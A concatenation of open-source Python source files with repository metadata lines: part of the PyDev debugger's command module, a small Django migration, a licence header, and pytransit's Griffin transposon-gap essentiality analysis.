payload = str(curr_frame_id) + '\t' + exc_type + "\t" + exc_desc + "\t" + \
self.make_thread_suspend_str(thread_id, trace_obj.tb_frame, CMD_SEND_CURR_EXCEPTION_TRACE, '')
return NetCommand(CMD_SEND_CURR_EXCEPTION_TRACE, seq, payload)
except Exception:
return self.make_error_message(seq, get_exception_traceback_str())
def make_send_curr_exception_trace_proceeded_message(self, seq, thread_id):
    # NOTE(review): *seq* is ignored -- both the command and any error are
    # sent with sequence 0; confirm whether that is intentional.
    try:
        return NetCommand(CMD_SEND_CURR_EXCEPTION_TRACE_PROCEEDED, 0, str(thread_id))
    except:
        return self.make_error_message(0, get_exception_traceback_str())
def make_send_console_message(self, seq, payload):
    """Wraps *payload* in a CMD_EVALUATE_CONSOLE_EXPRESSION command."""
    try:
        cmd = NetCommand(CMD_EVALUATE_CONSOLE_EXPRESSION, seq, payload)
    except Exception:
        cmd = self.make_error_message(seq, get_exception_traceback_str())
    return cmd
def make_custom_operation_message(self, seq, payload):
    """Wraps *payload* in a CMD_RUN_CUSTOM_OPERATION response command."""
    try:
        cmd = NetCommand(CMD_RUN_CUSTOM_OPERATION, seq, payload)
    except Exception:
        cmd = self.make_error_message(seq, get_exception_traceback_str())
    return cmd
def make_load_source_message(self, seq, source, dbg=None):
    """Builds a CMD_LOAD_SOURCE command carrying *source*.

    When *dbg* is given, the command is also queued on its writer before
    being returned.
    """
    try:
        command = NetCommand(CMD_LOAD_SOURCE, seq, '%s' % source)
    except:
        command = self.make_error_message(0, get_exception_traceback_str())
    if dbg:
        dbg.writer.add_command(command)
    return command
def make_show_console_message(self, thread_id, frame):
    """Builds a CMD_SHOW_CONSOLE command with the frame's suspend string."""
    try:
        suspend_str = self.make_thread_suspend_str(thread_id, frame, CMD_SHOW_CONSOLE, '')
        return NetCommand(CMD_SHOW_CONSOLE, 0, suspend_str)
    except:
        return self.make_error_message(0, get_exception_traceback_str())
def make_input_requested_message(self, started):
    """Builds a CMD_INPUT_REQUESTED command with the given payload."""
    try:
        cmd = NetCommand(CMD_INPUT_REQUESTED, 0, started)
    except:
        cmd = self.make_error_message(0, get_exception_traceback_str())
    return cmd
def make_exit_message(self):
    """Builds the CMD_EXIT command (empty payload, sequence 0)."""
    try:
        command = NetCommand(CMD_EXIT, 0, '')
    except:
        command = self.make_error_message(0, get_exception_traceback_str())
    return command
# Identifiers for internal commands (arbitrary distinct integer codes).
INTERNAL_TERMINATE_THREAD = 1
INTERNAL_SUSPEND_THREAD = 2
#=======================================================================================================================
# InternalThreadCommand
#=======================================================================================================================
class InternalThreadCommand:
    """Base class for commands generated/executed by the debugger itself.

    Some commands must run on a specific thread, so instances are posted
    to PyDB.cmdQueue and only executed by the thread that matches
    can_be_executed_by().
    """

    def can_be_executed_by(self, thread_id):
        """By default a command may only run on its own thread (exact id
        match, or a composite id ending with '|<thread_id>')."""
        if self.thread_id == thread_id:
            return True
        return self.thread_id.endswith('|' + thread_id)

    def do_it(self, dbg):
        raise NotImplementedError("you have to override do_it")
class ReloadCodeCommand(InternalThreadCommand):
    # Reloads a module in-place via pydevd_reload.xreload on the thread
    # identified by thread_id; a thread_id of '*' means any thread may run it.

    def __init__(self, module_name, thread_id):
        self.thread_id = thread_id
        self.module_name = module_name
        self.executed = False          # set once do_it has run
        self.lock = thread.allocate_lock()

    def can_be_executed_by(self, thread_id):
        if self.thread_id == '*':
            return True  # Any thread can execute it!
        return InternalThreadCommand.can_be_executed_by(self, thread_id)

    def do_it(self, dbg):
        # Guard so the reload happens at most once even if several threads
        # pick the command up.
        self.lock.acquire()
        try:
            if self.executed:
                return
            self.executed = True
        finally:
            self.lock.release()
        module_name = self.module_name
        if not dict_contains(sys.modules, module_name):
            # Fall back to the last component of a dotted name -- the module
            # may be registered in sys.modules under its short name.
            if '.' in module_name:
                new_module_name = module_name.split('.')[-1]
                if dict_contains(sys.modules, new_module_name):
                    module_name = new_module_name
        if not dict_contains(sys.modules, module_name):
            sys.stderr.write('pydev debugger: Unable to find module to reload: "' + module_name + '".\n')
            # Too much info...
            # sys.stderr.write('pydev debugger: This usually means you are trying to reload the __main__ module (which cannot be reloaded).\n')
        else:
            sys.stderr.write('pydev debugger: Start reloading module: "' + module_name + '" ... \n')
            from _pydevd_bundle import pydevd_reload
            if pydevd_reload.xreload(sys.modules[module_name]):
                sys.stderr.write('pydev debugger: reload finished\n')
            else:
                sys.stderr.write('pydev debugger: reload finished without applying any change\n')
#=======================================================================================================================
# InternalTerminateThread
#=======================================================================================================================
class InternalTerminateThread(InternalThreadCommand):
    """Logs the kill request and sends a thread-killed message for it."""

    def __init__(self, thread_id):
        self.thread_id = thread_id

    def do_it(self, dbg):
        pydevd_log(1, "killing ", str(self.thread_id))
        kill_cmd = dbg.cmd_factory.make_thread_killed_message(self.thread_id)
        dbg.writer.add_command(kill_cmd)
#=======================================================================================================================
# InternalRunThread
#=======================================================================================================================
class InternalRunThread(InternalThreadCommand):
    """Resumes a thread: clears any pending step command and sets STATE_RUN."""

    def __init__(self, thread_id):
        self.thread_id = thread_id

    def do_it(self, dbg):
        target = pydevd_find_thread_by_id(self.thread_id)
        if target:
            info = target.additional_info
            info.pydev_step_cmd = -1
            info.pydev_step_stop = None
            info.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalStepThread
#=======================================================================================================================
class InternalStepThread(InternalThreadCommand):
    """Applies the given step command id to a thread and resumes it."""

    def __init__(self, thread_id, cmd_id):
        self.thread_id = thread_id
        self.cmd_id = cmd_id

    def do_it(self, dbg):
        target = pydevd_find_thread_by_id(self.thread_id)
        if target:
            info = target.additional_info
            info.pydev_step_cmd = self.cmd_id
            info.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalSetNextStatementThread
#=======================================================================================================================
class InternalSetNextStatementThread(InternalThreadCommand):
    # Implements "set next statement": records the target line/function on
    # the suspended thread's info and resumes it so the trace dispatch can
    # perform the jump.

    def __init__(self, thread_id, cmd_id, line, func_name):
        self.thread_id = thread_id
        self.cmd_id = cmd_id
        self.line = line
        if IS_PY2:
            if isinstance(func_name, unicode):
                # On cython with python 2.X it requires an str, not unicode (but on python 3.3 it should be a str, not bytes).
                func_name = func_name.encode('utf-8')
        self.func_name = func_name

    def do_it(self, dbg):
        t = pydevd_find_thread_by_id(self.thread_id)
        if t:
            t.additional_info.pydev_step_cmd = self.cmd_id
            t.additional_info.pydev_next_line = int(self.line)
            t.additional_info.pydev_func_name = self.func_name
            t.additional_info.pydev_state = STATE_RUN
#=======================================================================================================================
# InternalGetVariable
#=======================================================================================================================
class InternalGetVariable(InternalThreadCommand):
    """Resolves a compound variable's children and sends them back as XML."""

    def __init__(self, seq, thread_id, frame_id, scope, attrs):
        self.sequence = seq
        self.thread_id = thread_id
        self.frame_id = frame_id
        self.scope = scope
        self.attributes = attrs  # '\t'-separated attribute path to resolve

    def do_it(self, dbg):
        """ Converts request into python variable """
        try:
            xml = "<xml>"
            _typeName, valDict = pydevd_vars.resolve_compound_variable(self.thread_id, self.frame_id, self.scope, self.attributes)
            if valDict is None:
                valDict = {}
            keys = valDict.keys()
            # Keep insertion order for OrderedDict and on Python >= 3.6
            # (plain dicts preserve order there); otherwise sort the keys,
            # picking whichever sort API this interpreter supports.
            if _typeName != "OrderedDict" and not IS_PY36_OR_GREATER:
                if hasattr(keys, 'sort'):
                    keys.sort(compare_object_attrs)  # Python 3.0 does not have it
                else:
                    if IS_PY3K:
                        keys = sorted(keys, key=cmp_to_key(compare_object_attrs))  # Jython 2.1 does not have it (and all must be compared as strings).
                    else:
                        keys = sorted(keys, cmp=compare_object_attrs)  # Jython 2.1 does not have it (and all must be compared as strings).
            for k in keys:
                xml += pydevd_xml.var_to_xml(valDict[k], to_string(k))
            xml += "</xml>"
            cmd = dbg.cmd_factory.make_get_variable_message(self.sequence, xml)
            dbg.writer.add_command(cmd)
        except Exception:
            cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error resolving variables " + get_exception_traceback_str())
            dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalGetArray
#=======================================================================================================================
class InternalGetArray(InternalThreadCommand):
    # Evaluates an array-like variable in its frame and returns a
    # rows x cols slice (starting at roffset/coffset) rendered as XML.

    def __init__(self, seq, roffset, coffset, rows, cols, format, thread_id, frame_id, scope, attrs):
        self.sequence = seq
        self.thread_id = thread_id
        self.frame_id = frame_id
        self.scope = scope
        self.name = attrs.split("\t")[-1]  # last path component is the variable name
        self.attrs = attrs
        self.roffset = int(roffset)
        self.coffset = int(coffset)
        self.rows = int(rows)
        self.cols = int(cols)
        self.format = format

    def do_it(self, dbg):
        try:
            frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
            var = pydevd_vars.eval_in_context(self.name, frame.f_globals, frame.f_locals)
            xml = pydevd_vars.table_like_struct_to_xml(var, self.name, self.roffset, self.coffset, self.rows, self.cols, self.format )
            cmd = dbg.cmd_factory.make_get_array_message(self.sequence, xml)
            dbg.writer.add_command(cmd)
        except:
            cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error resolving array: " + get_exception_traceback_str())
            dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalChangeVariable
#=======================================================================================================================
class InternalChangeVariable(InternalThreadCommand):
    """Assigns the value of an expression to a variable inside a frame and
    reports the resulting value back as XML."""

    def __init__(self, seq, thread_id, frame_id, scope, attr, expression):
        self.sequence = seq
        self.thread_id = thread_id
        self.frame_id = frame_id
        self.scope = scope
        self.attr = attr
        self.expression = expression

    def do_it(self, dbg):
        """Performs the assignment and queues the response command."""
        try:
            new_value = pydevd_vars.change_attr_expression(self.thread_id, self.frame_id, self.attr, self.expression, dbg)
            xml = "".join(["<xml>", pydevd_xml.var_to_xml(new_value, ""), "</xml>"])
            response = dbg.cmd_factory.make_variable_changed_message(self.sequence, xml)
            dbg.writer.add_command(response)
        except Exception:
            response = dbg.cmd_factory.make_error_message(self.sequence, "Error changing variable attr:%s expression:%s traceback:%s" % (self.attr, self.expression, get_exception_traceback_str()))
            dbg.writer.add_command(response)
#=======================================================================================================================
# InternalGetFrame
#=======================================================================================================================
class InternalGetFrame(InternalThreadCommand):
    """Returns the local variables of the requested frame as XML."""

    def __init__(self, seq, thread_id, frame_id):
        self.sequence = seq
        self.thread_id = thread_id
        self.frame_id = frame_id

    def do_it(self, dbg):
        """ Converts request into python variable """
        try:
            frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
            if frame is not None:
                hidden_ns = pydevconsole.get_ipython_hidden_vars()
                xml = "<xml>"
                xml += pydevd_xml.frame_vars_to_xml(frame.f_locals, hidden_ns)
                del frame  # drop the frame reference as soon as possible
                xml += "</xml>"
                cmd = dbg.cmd_factory.make_get_frame_message(self.sequence, xml)
                dbg.writer.add_command(cmd)
            else:
                # pydevd_vars.dump_frames(self.thread_id)
                # don't print this error: frame not found: means that the client is not synchronized (but that's ok)
                cmd = dbg.cmd_factory.make_error_message(self.sequence, "Frame not found: %s from thread: %s" % (self.frame_id, self.thread_id))
                dbg.writer.add_command(cmd)
        except:
            cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error resolving frame: %s from thread: %s" % (self.frame_id, self.thread_id))
            dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalEvaluateExpression
#=======================================================================================================================
class InternalEvaluateExpression(InternalThreadCommand):
    """Evaluates an expression in the context of a frame and returns the
    result as XML."""

    def __init__(self, seq, thread_id, frame_id, expression, doExec, doTrim, temp_name):
        self.sequence = seq
        self.thread_id = thread_id
        self.frame_id = frame_id
        self.expression = expression
        self.doExec = doExec      # forwarded to pydevd_vars.evaluate_expression
        self.doTrim = doTrim      # forwarded to pydevd_xml.var_to_xml
        self.temp_name = temp_name

    def do_it(self, dbg):
        """ Converts request into python variable """
        try:
            result = pydevd_vars.evaluate_expression(self.thread_id, self.frame_id, self.expression, self.doExec)
            if self.temp_name != "":
                # Also bind the result in the frame under temp_name.
                pydevd_vars.change_attr_expression(self.thread_id, self.frame_id, self.temp_name, self.expression, dbg, result)
            xml = "<xml>"
            xml += pydevd_xml.var_to_xml(result, self.expression, self.doTrim)
            xml += "</xml>"
            cmd = dbg.cmd_factory.make_evaluate_expression_message(self.sequence, xml)
            dbg.writer.add_command(cmd)
        except:
            exc = get_exception_traceback_str()
            sys.stderr.write('%s\n' % (exc,))
            cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error evaluating expression " + exc)
            dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalGetCompletions
#=======================================================================================================================
class InternalGetCompletions(InternalThreadCommand):
    """ Gets the completions in a given scope """

    def __init__(self, seq, thread_id, frame_id, act_tok):
        self.sequence = seq
        self.thread_id = thread_id
        self.frame_id = frame_id
        self.act_tok = act_tok  # token being completed

    def do_it(self, dbg):
        """ Converts request into completions """
        try:
            # NOTE(review): remove_path is never reassigned in this method,
            # so the finally-block cleanup below is currently a no-op.
            remove_path = None
            try:
                frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
                if frame is not None:
                    msg = _pydev_completer.generate_completions_as_xml(frame, self.act_tok)
                    cmd = dbg.cmd_factory.make_get_completions_message(self.sequence, msg)
                    dbg.writer.add_command(cmd)
                else:
                    cmd = dbg.cmd_factory.make_error_message(self.sequence, "InternalGetCompletions: Frame not found: %s from thread: %s" % (self.frame_id, self.thread_id))
                    dbg.writer.add_command(cmd)
            finally:
                if remove_path is not None:
                    sys.path.remove(remove_path)
        except:
            exc = get_exception_traceback_str()
            sys.stderr.write('%s\n' % (exc,))
            cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error evaluating expression " + exc)
            dbg.writer.add_command(cmd)
# =======================================================================================================================
# InternalGetDescription
# =======================================================================================================================
class InternalGetDescription(InternalThreadCommand):
    """ Fetch the variable description stub from the debug console
    """

    def __init__(self, seq, thread_id, frame_id, expression):
        self.sequence = seq
        self.thread_id = thread_id
        self.frame_id = frame_id
        self.expression = expression

    def do_it(self, dbg):
        """ Get completions and write back to the client
        """
        try:
            frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
            description = pydevd_console.get_description(frame, self.thread_id, self.frame_id, self.expression)
            # Quote and XML-escape so the description survives the wire format.
            description = pydevd_xml.make_valid_xml_value(quote(description, '/>_= \t'))
            description_xml = '<xml><var name="" type="" value="%s"/></xml>' % description
            cmd = dbg.cmd_factory.make_get_description_message(self.sequence, description_xml)
            dbg.writer.add_command(cmd)
        except:
            exc = get_exception_traceback_str()
            cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error in fetching description" + exc)
            dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalGetBreakpointException
#=======================================================================================================================
class InternalGetBreakpointException(InternalThreadCommand):
    """ Send details of exception raised while evaluating conditional breakpoint """

    def __init__(self, thread_id, exc_type, stacktrace):
        self.sequence = 0
        self.thread_id = thread_id
        self.stacktrace = stacktrace  # iterable of (filename, line, methodname, methodobj)
        self.exc_type = exc_type

    def do_it(self, dbg):
        try:
            callstack = "<xml>"
            makeValid = pydevd_xml.make_valid_xml_value
            for filename, line, methodname, methodobj in self.stacktrace:
                if file_system_encoding.lower() != "utf-8" and hasattr(filename, "decode"):
                    # filename is a byte string encoded using the file system encoding
                    # convert it to utf8
                    filename = filename.decode(file_system_encoding).encode("utf-8")
                callstack += '<frame thread_id = "%s" file="%s" line="%s" name="%s" obj="%s" />' \
                    % (self.thread_id, makeValid(filename), line, makeValid(methodname), makeValid(methodobj))
            callstack += "</xml>"
            cmd = dbg.cmd_factory.make_send_breakpoint_exception_message(self.sequence, self.exc_type + "\t" + callstack)
            dbg.writer.add_command(cmd)
        except:
            exc = get_exception_traceback_str()
            sys.stderr.write('%s\n' % (exc,))
            cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error Sending Exception: " + exc)
            dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalSendCurrExceptionTrace
#=======================================================================================================================
class InternalSendCurrExceptionTrace(InternalThreadCommand):
    """ Send details of the exception that was caught and where we've broken in.
    """

    def __init__(self, thread_id, arg, curr_frame_id):
        '''
        :param arg: exception type, description, traceback object
        '''
        self.sequence = 0
        self.thread_id = thread_id
        self.curr_frame_id = curr_frame_id
        self.arg = arg

    def do_it(self, dbg):
        try:
            cmd = dbg.cmd_factory.make_send_curr_exception_trace_message(self.sequence, self.thread_id, self.curr_frame_id, *self.arg)
            # Release the traceback reference as soon as the command is
            # built (NOTE: this makes do_it effectively single-shot).
            del self.arg
            dbg.writer.add_command(cmd)
        except:
            exc = get_exception_traceback_str()
            sys.stderr.write('%s\n' % (exc,))
            cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error Sending Current Exception Trace: " + exc)
            dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalSendCurrExceptionTraceProceeded
#=======================================================================================================================
class InternalSendCurrExceptionTraceProceeded(InternalThreadCommand):
    """Notifies the client that the reported exception trace proceeded."""

    def __init__(self, thread_id):
        self.sequence = 0
        self.thread_id = thread_id

    def do_it(self, dbg):
        try:
            notification = dbg.cmd_factory.make_send_curr_exception_trace_proceeded_message(self.sequence, self.thread_id)
            dbg.writer.add_command(notification)
        except:
            exc = get_exception_traceback_str()
            sys.stderr.write('%s\n' % (exc,))
            notification = dbg.cmd_factory.make_error_message(self.sequence, "Error Sending Current Exception Trace Proceeded: " + exc)
            dbg.writer.add_command(notification)
#=======================================================================================================================
# InternalEvaluateConsoleExpression
#=======================================================================================================================
class InternalEvaluateConsoleExpression(InternalThreadCommand):
    """ Execute the given command in the debug console """

    def __init__(self, seq, thread_id, frame_id, line, buffer_output=True):
        self.sequence = seq
        self.thread_id = thread_id
        self.frame_id = frame_id
        self.line = line                    # the console command to execute
        self.buffer_output = buffer_output

    def do_it(self, dbg):
        """ Create an XML for console output, error and more (true/false)
        <xml>
        <output message=output_message></output>
        <error message=error_message></error>
        <more>true/false</more>
        </xml>
        """
        try:
            frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
            if frame is not None:
                console_message = pydevd_console.execute_console_command(
                    frame, self.thread_id, self.frame_id, self.line, self.buffer_output)
                cmd = dbg.cmd_factory.make_send_console_message(self.sequence, console_message.to_xml())
            else:
                # No matching frame: report an error message to the console.
                from _pydevd_bundle.pydevd_console import ConsoleMessage
                console_message = ConsoleMessage()
                console_message.add_console_message(
                    pydevd_console.CONSOLE_ERROR,
                    "Select the valid frame in the debug view (thread: %s, frame: %s invalid)" % (self.thread_id, self.frame_id),
                )
                cmd = dbg.cmd_factory.make_error_message(self.sequence, console_message.to_xml())
        except:
            exc = get_exception_traceback_str()
            cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error evaluating expression " + exc)
        # The command built by whichever path ran above is queued here.
        dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalRunCustomOperation
#=======================================================================================================================
class InternalRunCustomOperation(InternalThreadCommand):
    """ Run a custom command on an expression
    """

    def __init__(self, seq, thread_id, frame_id, scope, attrs, style, encoded_code_or_file, fnname):
        self.sequence = seq
        self.thread_id = thread_id
        self.frame_id = frame_id
        self.scope = scope
        self.attrs = attrs
        self.style = style
        # The code (or file reference) arrives URL-encoded over the wire.
        self.code_or_file = unquote_plus(encoded_code_or_file)
        self.fnname = fnname

    def do_it(self, dbg):
        try:
            res = pydevd_vars.custom_operation(self.thread_id, self.frame_id, self.scope, self.attrs,
                                               self.style, self.code_or_file, self.fnname)
            resEncoded = quote_plus(res)  # URL-encode the result for transport
            cmd = dbg.cmd_factory.make_custom_operation_message(self.sequence, resEncoded)
            dbg.writer.add_command(cmd)
        except:
            exc = get_exception_traceback_str()
            cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error in running custom operation" + exc)
            dbg.writer.add_command(cmd)
#=======================================================================================================================
# InternalConsoleGetCompletions
#=======================================================================================================================
class InternalConsoleGetCompletions(InternalThreadCommand):
    """Fetches completions for the debug console and sends them back."""

    def __init__(self, seq, thread_id, frame_id, act_tok):
        self.sequence = seq
        self.thread_id = thread_id
        self.frame_id = frame_id
        self.act_tok = act_tok

    def do_it(self, dbg):
        """Computes the completions XML and queues the response command."""
        try:
            target_frame = pydevd_vars.find_frame(self.thread_id, self.frame_id)
            completions_xml = pydevd_console.get_completions(target_frame, self.act_tok)
            response = dbg.cmd_factory.make_send_console_message(self.sequence, completions_xml)
            dbg.writer.add_command(response)
        except:
            exc = get_exception_traceback_str()
            response = dbg.cmd_factory.make_error_message(self.sequence, "Error in fetching completions" + exc)
            dbg.writer.add_command(response)
#=======================================================================================================================
# InternalConsoleExec
#=======================================================================================================================
class InternalConsoleExec(InternalThreadCommand):
    """Executes an expression from the debug console in a frame's context."""

    def __init__(self, seq, thread_id, frame_id, expression):
        self.sequence = seq
        self.thread_id = thread_id
        self.frame_id = frame_id
        self.expression = expression

    def do_it(self, dbg):
        """ Converts request into python variable """
        try:
            try:
                # don't trace new threads created by console command
                disable_trace_thread_modules()
                result = pydevconsole.console_exec(self.thread_id, self.frame_id, self.expression, dbg)
                xml = "<xml>"
                xml += pydevd_xml.var_to_xml(result, "")
                xml += "</xml>"
                cmd = dbg.cmd_factory.make_evaluate_expression_message(self.sequence, xml)
                dbg.writer.add_command(cmd)
            except:
                exc = get_exception_traceback_str()
                sys.stderr.write('%s\n' % (exc,))
                cmd = dbg.cmd_factory.make_error_message(self.sequence, "Error evaluating console expression " + exc)
                dbg.writer.add_command(cmd)
        finally:
            # Always re-enable thread tracing and flush any output the
            # console command produced, even on failure.
            enable_trace_thread_modules()
            sys.stderr.flush()
            sys.stdout.flush()
#=======================================================================================================================
# pydevd_find_thread_by_id
#=======================================================================================================================
def pydevd_find_thread_by_id(thread_id):
    """Return the live thread whose id matches *thread_id*, or None.

    A composite id ending with '|<tid>' also matches.
    """
    try:
        # there was a deadlock here when I did not remove the tracing function
        # when thread was dead -- hence enumerating live threads each call.
        all_threads = threading.enumerate()
        for candidate in all_threads:
            tid = get_thread_id(candidate)
            if thread_id == tid or thread_id.endswith('|' + tid):
                return candidate
        sys.stderr.write("Could not find thread %s\n" % thread_id)
        sys.stderr.write("Available: %s\n" % [get_thread_id(t) for t in all_threads])
        sys.stderr.flush()
    except:
        traceback.print_exc()
    return None
| suncycheng/intellij-community | python/helpers/pydev/_pydevd_bundle/pydevd_comm.py | Python | apache-2.0 | 60,914 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    # Adds a 'creation_time' timestamp to the Skills model; existing rows
    # get the value of django.utils.timezone.now at migration time.

    dependencies = [
        ('hiscores', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='skills',
            name='creation_time',
            field=models.DateTimeField(default=django.utils.timezone.now),
        ),
    ]
| RaghavPro/Runescape-Hiscores | hiscores/migrations/0002_skills_creation_time.py | Python | gpl-2.0 | 450 |
#
# AtHomePowerlineServer - networked server for CM11/CM11A/XTB-232 X10 controllers
# Copyright (C) 2014 Dave Hocker
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# See the LICENSE file for more details.
#
# Database | dhocker/athomepowerlineserver | database/__init__.py | Python | gpl-3.0 | 387 |
import sys
try:
import wx
WX_VERSION = int(wx.version()[0])
hasWx = True
except Exception as e:
hasWx = False
WX_VERSION = 0
if hasWx:
import wx.xrc
from wx.lib.buttons import GenBitmapTextButton
from pubsub import pub
import wx.adv
import os
import time
import math
import random
import numpy
import scipy.stats
import datetime
from pytransit.analysis import base
import pytransit.transit_tools as transit_tools
import pytransit.tnseq_tools as tnseq_tools
import pytransit.norm_tools as norm_tools
import pytransit.stat_tools as stat_tools
#method_name = "griffin"
############# GUI ELEMENTS ##################
# Metadata TRANSIT uses to register and display this analysis method.
short_name = "griffin"
long_name = "Griffin"
short_desc = "Basic frequentist analysis of essentiality using gaps."
long_desc = "Analysis of gaps used in Griffin et al. 2011"
transposons = ["himar1"]  # transposon types this method accepts
# Column headers of the tab-separated results file written by Run().
columns = ["Orf","Name","Desc","k","n","r","s","t","Expected Run","p-value", "p-adjusted"]
############# Analysis Method ##############
class GriffinAnalysis(base.TransitAnalysis):
    # Registers the Griffin method with TRANSIT, wiring together its
    # runner (GriffinMethod), GUI panel and result-file handler.
    def __init__(self):
        base.TransitAnalysis.__init__(self, short_name, long_name, short_desc, long_desc, transposons, GriffinMethod, GriffinGUI, [GriffinFile])
################## FILE ###################
class GriffinFile(base.TransitFile):
    """Result-file handler for Griffin output (files tagged '#Griffin')."""

    def __init__(self):
        base.TransitFile.__init__(self, "#Griffin", columns)

    def getHeader(self, path):
        """Summarize a results file: count genes called essential
        (last column, the adjusted p-value, < 0.05) vs non-essential.

        Fix: removed the unused 'unc' and 'short' counters that were
        initialized but never read.
        """
        ess = 0
        non = 0
        for line in open(path):
            if line.startswith("#"):
                continue
            tmp = line.strip().split("\t")
            if float(tmp[-1]) < 0.05:
                ess += 1
            else:
                non += 1
        text = """Results:
Essentials: %s
Non-Essential: %s
""" % (ess, non)
        return text
################## GUI ###################
class GriffinGUI(base.AnalysisGUI):
    # wxPython options panel for the Griffin method: a title label and a
    # "Run griffin" button (the method itself has no extra parameters here).

    def definePanel(self, wxobj):
        """Builds the options panel inside wxobj.optionsWindow and stores it
        on self.panel."""
        self.wxobj = wxobj
        griffinPanel = wx.Panel( self.wxobj.optionsWindow, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )

        griffinSection = wx.BoxSizer( wx.VERTICAL )

        # Section title.
        griffinLabel = wx.StaticText( griffinPanel, wx.ID_ANY, u"griffin Options", wx.DefaultPosition, (120,-1), 0 )
        griffinLabel.SetFont( wx.Font( 10, wx.DEFAULT, wx.NORMAL, wx.BOLD) )
        griffinSection.Add( griffinLabel, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 5 )

        # Placeholder sizer (no extra options yet).
        griffinSizer1 = wx.BoxSizer( wx.HORIZONTAL )
        griffinSection.Add( griffinSizer1, 1, wx.EXPAND, 5 )

        griffinButton = wx.Button( griffinPanel, wx.ID_ANY, u"Run griffin", wx.DefaultPosition, wx.DefaultSize, 0 )
        griffinSection.Add( griffinButton, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 5 )

        griffinPanel.SetSizer( griffinSection )
        griffinPanel.Layout()
        griffinSection.Fit( griffinPanel )

        # Connect events: the run button triggers the shared RunMethod handler.
        griffinButton.Bind( wx.EVT_BUTTON, self.wxobj.RunMethod )

        self.panel = griffinPanel
########## CLASS #######################
class GriffinMethod(base.SingleConditionMethod):
"""
griffin
"""
def __init__(self,
ctrldata,
annotation_path,
output_file,
minread=1,
replicates="Sum",
normalization=None,
LOESS=False,
ignoreCodon=True,
NTerminus=0.0,
CTerminus=0.0, wxobj=None):
base.SingleConditionMethod.__init__(self, short_name, long_name, short_desc, long_desc, ctrldata, annotation_path, output_file, replicates=replicates, normalization=normalization, LOESS=LOESS, ignoreCodon=ignoreCodon, NTerminus=NTerminus, CTerminus=CTerminus, wxobj=wxobj)
self.minread = minread
@classmethod
def fromGUI(self, wxobj):
""" """
#Get Annotation file
annotationPath = wxobj.annotation
if not transit_tools.validate_annotation(annotationPath):
return None
#Get selected files
ctrldata = wxobj.ctrlSelected()
if not transit_tools.validate_control_datasets(ctrldata):
return None
#Validate transposon types
if not transit_tools.validate_transposons_used(ctrldata, transposons):
return None
#
minread = 1
#Read the parameters from the wxPython widgets
ignoreCodon = True
NTerminus = float(wxobj.globalNTerminusText.GetValue())
CTerminus = float(wxobj.globalCTerminusText.GetValue())
replicates = "Sum"
normalization = None
LOESS = False
#Get output path
name = transit_tools.basename(ctrldata[0])
defaultFileName = "griffin_output.dat"
defaultDir = os.getcwd()
output_path = wxobj.SaveFile(defaultDir, defaultFileName)
if not output_path: return None
output_file = open(output_path, "w")
return self(ctrldata,
annotationPath,
output_file,
minread,
replicates,
normalization,
LOESS,
ignoreCodon,
NTerminus,
CTerminus, wxobj)
@classmethod
def fromargs(self, rawargs):
(args, kwargs) = transit_tools.cleanargs(rawargs)
ctrldata = args[0].split(",")
annotationPath = args[1]
outpath = args[2]
output_file = open(outpath, "w")
minread = int(kwargs.get("m", 1))
replicates = kwargs.get("r", "Sum")
normalization = None
LOESS = False
ignoreCodon = not kwargs.get("sC", False)
NTerminus = float(kwargs.get("iN", 0.0))
CTerminus = float(kwargs.get("iC", 0.0))
return self(ctrldata,
annotationPath,
output_file,
minread,
replicates,
normalization,
LOESS,
ignoreCodon,
NTerminus,
CTerminus)
def Run(self):
self.transit_message("Starting Griffin Method")
start_time = time.time()
#Get orf data
self.transit_message("Getting Data")
(data, position) = transit_tools.get_validated_data(self.ctrldata, wxobj=self.wxobj)
(K,N) = data.shape
if self.normalization and self.normalization != "nonorm":
self.transit_message("Normalizing using: %s" % self.normalization)
(data, factors) = norm_tools.normalize_data(data, self.normalization, self.ctrldata, self.annotation_path)
G = tnseq_tools.Genes(self.ctrldata, self.annotation_path, minread=1, reps=self.replicates, ignoreCodon=self.ignoreCodon, nterm=self.NTerminus, cterm=self.CTerminus, data=data, position=position)
N = len(G)
self.progress_range(N)
count = 0
pins = G.global_theta()
pnon = 1.0 - pins
results = []
for gene in G:
if gene.n == 0:
results.append([gene, 0.0, 1.000])
else:
B = 1.0/math.log(1.0/pnon)
u = math.log(gene.n*pins, 1.0/pnon)
exprun = tnseq_tools.ExpectedRuns(gene.n, pnon)
pval = 1.0 - tnseq_tools.GumbelCDF(gene.r, u, B)
results.append([gene, exprun, pval])
text = "Running Griffin Method... %5.1f%%" % (100.0*(count+1)/(N))
self.progress_update(text, count)
count+=1
pval = [row[-1] for row in results]
padj = stat_tools.BH_fdr_correction(pval)
for i in range(len(results)):
results[i].append(padj[i])
results.sort()
